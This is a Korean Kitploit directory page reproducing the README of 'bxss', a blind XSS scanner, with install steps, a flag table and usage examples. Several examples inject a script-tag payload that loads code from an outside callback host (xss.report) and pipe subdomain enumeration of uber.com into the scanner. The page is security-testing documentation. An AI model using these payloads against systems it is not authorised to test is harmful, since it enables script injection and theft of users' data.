Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/ethicalhackingplayground/bxss
Vulnerability ScannersWeb Vulnerability ScannersInformation GatheringWeb SecurityPenetration Testing
GitHubethicalhackingplayground/bxss

bxss

Blind XSS Scanner는 웹 애플리케이션에서 블라인드 XSS 취약점을 스캔하는 데 사용할 수 있는 도구입니다.

저장소 보기
418551년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유


Bxss
Bxss - 블라인드 XSS 스캐너

Version License Go Report Card Go Reference


🚀 설명

Bxss는 웹 애플리케이션에서 블라인드 XSS 취약점 탐지를 자동화하는 고성능 블라인드 XSS 스캐너입니다.


✨ 기능

  • 사용자 정의 헤더 및 매개변수에 블라인드 XSS 페이로드 주입
  • 다중 HTTP 메서드 지원 (PUT, POST, GET, OPTIONS)
  • 동시성 지원을 통한 고속 스캐닝
  • 다른 도구와 쉽게 연결 가능
  • 간편한 설치 및 사용

🧠 진행 중

저희는 저사양 기기에서 bxss의 성능을 향상시키기 위해 Chromium 기반 워커 풀을 통합하는 작업을 활발히 진행 중입니다.

이 기능은 DOM 기반 XSS 탐지나 트리거 후 페이로드 검사와 같은 리소스 집약적인 작업을 풀을 통해 관리되는 가벼운 Chromium 인스턴스에 오프로드할 수 있도록 합니다. 여러 헤드리스 브라우저 컨텍스트에 워크로드를 통제되고 효율적으로 분산함으로써, bxss는 저사양 기기에서도 응답성과 사용성을 유지할 것입니다.

이를 통해 bxss는 시스템 제약에 관계없이 강력할 뿐만 아니라 높은 접근성을 갖추게 될 것입니다.


✅ 할 일

  • DOM 상호작용 및 시각적 검증을 위한 Chromium 기반 워커 풀
  • 선택적 HTML/JSON 보고서 출력
  • 다중 플랫폼 페이로드 사용자 정의 지원 추가 (XSS Hunter, Interactsh 등)
  • 프록시 지원
  • 사용자 정의 요청 가져오기

🧪 실험적 기능

  • 추적 모드 (실험적)

📦 설치

root@kitploit:~
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

⚙️ 인수


🎬 데모

Demo


📝 추적 모드란?

추적 모드는 블라인드 XSS가 트리거된 위치를 추적할 수 있는 실험적 기능입니다. https://xss.report/와 같은 일부 타사 블라인드 XSS 플랫폼에서는 페이로드에 사용자 정의 매개변수를 지정할 수 있습니다. 이를 통해 블라인드 XSS가 트리거된 위치를 추적할 수 있습니다. 예를 들어 페이로드에 url=https://somehost.com 매개변수를 지정하면 도구는 다음 페이로드를 사용합니다.

root@kitploit:~
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'

테스트 중이며 트리거 시 DOM을 검사하여 블라인드 XSS가 어떤 호스트에서 트리거되었는지 확인할 수 있습니다.

XSS 보고서

대시보드에서 사용자 정의 매개변수를 할당할 때 url={LINK}를 할당해야 bxss가 자동으로 {LINK}를 실제 URL로 대체할 수 있습니다.

🔥 사용 예제

매개변수

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t

매개변수에 추가

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t

헤더와 매개변수 모두

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

X-Forwarded-For 헤더

root@kitploit:~
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"

사용자 정의 헤더 및 매개변수

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Dorki를 사용한 Google Dorks

root@kitploit:~
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'

속도 제한이 있는 사용자 정의 헤더 및 매개변수

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \ 
-t \
-rl 10

고급 도킹 및 취약점 탐색을 위해 Dorki를 확인하고 오늘 가입하세요!


☕ 프로젝트 지원

이 도구로 현상금을 받았다면, 커피 한 잔 사주는 것을 고려해주세요!

Buy Me A Coffee

도구 다운로드
인수설명기본값
-a페이로드를 매개변수에 추가false
-c int동시성 수준 설정30
-H string사용자 정의 헤더 설정""
-hf string헤더 파일 경로""
-p string블라인드 XSS 페이로드""
-pf string페이로드 파일 경로""
-t블라인드 XSS 매개변수 테스트false
-X string사용할 HTTP 메서드""
-v디버그 모드 활성화false
-rl float속도 제한 (초당 요청 수)0
-f리디렉션 따르기false
-l추적 모드 활성화 (실험적)false